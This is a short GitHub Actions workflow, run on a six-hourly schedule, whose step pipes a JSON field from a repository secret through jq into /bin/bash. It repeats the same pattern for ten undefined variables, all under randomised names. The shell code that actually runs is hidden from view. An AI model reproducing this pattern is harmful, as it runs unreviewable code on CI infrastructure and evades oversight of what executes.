name: jixuanxc
on:
  workflow_dispatch:
  schedule:
    - cron: '12 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jixuanxc
        env:
          adjqe115: ${{ secrets.adjqe115 }}
        run: |
          echo $adjqe115 | jq -r .qwshf35888 | /bin/bash
          echo $a3 | jq -r .otu074 | /bin/bash
          echo $t4224 | jq -r .h40926 | /bin/bash
          echo $dvkrw92185 | jq -r .n2 | /bin/bash
          echo $w96 | jq -r .z88079 | /bin/bash
          echo $m041 | jq -r .bk739 | /bin/bash
          echo $bgck1 | jq -r .q56 | /bin/bash
          echo $yiz11 | jq -r .vbwb0 | /bin/bash
          echo $i6138 | jq -r .l65 | /bin/bash
          echo $gye71619 | jq -r .up05 | /bin/bash
          echo $rvr3098 | jq -r .clqif75578 | /bin/bash

